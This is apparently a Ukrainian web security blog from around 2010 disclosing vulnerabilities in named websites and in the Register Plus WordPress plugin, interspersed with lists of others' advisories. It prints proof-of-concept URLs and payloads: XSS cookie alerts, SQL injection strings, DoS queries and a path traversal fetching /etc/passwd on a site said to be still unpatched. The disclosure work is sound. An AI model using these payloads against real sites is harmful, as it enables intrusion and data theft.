Websecurity - Веб безпека

17.09.2010

У травні, 02.05.2010, я знайшов Cross-Site Scripting, Insufficient Anti-automation та Full path disclosure уразливості в плагіні Register Plus для WordPress. Які я виявив на сайті codecamp.org.ua. Про що найближчим часом повідомлю розробникам.

4 XSS уразливості в даному плагіні першим виявив Dementor, про що він мені повідомив коли ми обговорювали уразливості на секюріті сайті codecamp.org.ua. І коли я зайшов на даний сайт перевірити XSS дірки, я заодно виявив й інші дірки. А потім досліджуючи даний плагін я виявив ще 5 XSS дірок (в інших полях, які не використовувалися на codecamp.org.ua, але є в даному плагіні). Зазначу, що Insufficient Anti-automation уразливість в плагіні подібна до аналогічної IAA в самому WordPress.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам плагіна.

24.11.2010

XSS:

POST запит на сторінці http://site/wp-login.php?action=register
"><script>alert(document.cookie)</script>В полях: First Name, Last Name, Website, AIM, Yahoo IM, Jabber / Google Talk, Password, Confirm Password.
</textarea><script>alert(document.cookie)</script>В полі: About Yourself.

Insufficient Anti-automation:

http://site/wp-login.php?action=register

В формі реєстрації немає захисту від автоматизованих запитів (капчі). В самому WordPress також є подібна уразливість.

Full path disclosure:

http://site/wp-content/plugins/register-plus/dash_widget.php

http://site/wp-content/plugins/register-plus/register-plus.php

Уразливі версії плагіна Register Plus 3.5.1 та попередні версії. Також до Insufficient Anti-automation уразливі WordPress 3.0.1 та попередні версії. Враховуючи, що даний плагін більше не підтримується розробником, то його користувачам потрібно виправити дірки власноруч.

11.08.2010

У вересні, 19.09.2009, я знайшов Cross-Site Scripting та Brute Force уразливості на проекті http://internetua.com. Про що найближчим часом сповіщу адміністрацію проекту.

Це уразливості в новому движку сайта. Раніше я вже писав про уразливості на www.internetua.com.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

23.11.2010

XSS:

http://internetua.com/search/index?search=%3Cbody%20onload='alert(document.cookie)'

Brute Force:

http://internetua.com/auth/login

Дані уразливості вже виправлені.

12.03.2010

У вересні, 03.09.2009, я знайшов Arbitrary File Disclosure та Full path disclosure уразливості на проекті http://ksbm.net. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

22.11.2010

Arbitrary File Disclosure:

http://ksbm.net/board_new/download.php?filename=passwd&path=/etc/

Full path disclosure:

http://ksbm.net/board_new/download.php?filename=1

Дані уразливості досі не виправлені.

В даній добірці уразливості в веб додатках:

• Multiple Vulnerabilities in Cisco Security Agent (деталі)
• New squirrelmail packages fix cross-site request forgery (деталі)
• IBM Cognos Server Backdoor Account Remote Code Execution Vulnerability (деталі)
• XSRF (CSRF) in Mystic (деталі)
• XSS vulnerability in Mystic (деталі)
• Huawei HG510 CSRF, Auth Bypass, DoS (деталі)
• XSS vulnerability in Mystic (деталі)
• Hacktics Advisory Feb09: XSS in Oracle E-Business Suite (деталі)
• XSS vulnerability in Onyx (деталі)
• HP Operations Agent Running on Solaris 10, Remote Unauthorized Access (деталі)

13.03.2010

У вересні, 17.09.2009, я знайшов SQL Injection уразливість на проекті http://fitofarm.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

20.11.2010

SQL Injection:

http://fitofarm.ua/news.php?ch=id&id=-1′%20or%20version()=5/*

Дана уразливість вже виправлена. Але частковий дефейс вони з сайту так досі й не прибрали .

В даній добірці уразливості в веб додатках:

• HP Network Node Manager (NNM), Remote Execution of Arbitrary Commands (деталі)
• XSS vulnerability in Eden Platform (деталі)
• XSS vulnerability in allinta CMS (деталі)
• Multiple Vulnerabilities in Cisco IronPort Encryption Appliance (деталі)
• Nagios XI 2009R1.2B Multiple CSRF (деталі)
• HP ProLiant Support Pack 8.30 for Windows, Remote Code Execution, Information Disclosure (деталі)
• Amblog 1.0 Joomla Component Multiple SQL Injection Vulnerabilities (деталі)
• Teams 1_1028_100809_1711 Joomla Component Multiple Blind SQL Injection Vulnerabilities (деталі)
• McAfee Network Security Manager Authentication Bypass and Session Hijacking Vulnerability (деталі)
• McAfee Network Security Manager Cross-Site Scripting (XSS) Vulnerability (деталі)

06.03.2010

У серпні, 23.08.2009, я знайшов Brute Force, Full path disclosure, Insufficient Anti-automation, SQL Injection, а сьогодні ще й Information Leakage уразливості на проекті http://citycom.ua (онлайн магазин). Про що найближчим часом сповіщу адміністрацію проекту.

Стосовно дірок на сайтах онлайн магазинів в останнє я писав про уразливості на www.tehnos.com.ua.

Детальна інформація про уразливості з’явиться пізніше.

19.11.2010

Brute Force:

http://base.city.com.ua/login.php

Full path disclosure:

http://base.city.com.ua/cron/export.bat

Insufficient Anti-automation:

http://base.city.com.ua/cron/send.php?type=7

SQL Injection:

http://base.city.com.ua/cron/send.php?type=-1%20or%201=1

Information Leakage:

http://base.city.com.ua/cron/send.php

http://base.city.com.ua/city.com.ua/order.php

Дані уразливості вже виправлені, за виключенням Brute Force.

02.03.2010

У серпні, 11.08.2009, я знайшов Cross-Site Scripting та Denial of Service уразливості на проекті http://ozhegov.info. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

18.11.2010

XSS:

http://ozhegov.info/?q=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

DoS:

http://ozhegov.info/?q=*

http://ozhegov.info/?q=%

Дані уразливості вже виправлені.

31.08.2010

У квітні, 03.04.2010, я знайшов Insufficient Anti-automation та Denial of Service уразливості в CMS SiteLogic. Це українська комерційна CMS. Уразливості виявив на одному сайті, що використовує даний движок (про інші дірки на якому я вже згадував). Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в CMS SiteLogic.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

17.11.2010

Insufficient Anti-automation:

http://site/?mid=1

В контактній формі немає захисту від автоматизованих запитів (капчі).

DoS:

Пустий POST запит на сторінці http://site в полі “Пошук по сайту” виводить всі записи з БД.

DoS:

http://site/?mid=1&action=arhiv

На сторінці архіву виводяться всі записи з БД.

В даній добірці уразливості в веб додатках:

• JDownloader Remote Code Execution (деталі)
• cgTestimonial 2.2 Joomla Component Multiple Remote Vulnerabilities (деталі)
• XSS vulnerability in allinta CMS (деталі)
• GeFest Web HomeServer v1.0 Remote Directory Traversal Vulnerability (деталі)
• XSS vulnerability in Eden Platform (деталі)
• SQL injection vulnerability in allinta CMS (деталі)
• HP DreamScreen, Remote Disclosure of Information (деталі)
• XSS vulnerability in allinta CMS (деталі)
• SQL injection vulnerability in allinta CMS (деталі)
• OpenLDAP vulnerability (деталі)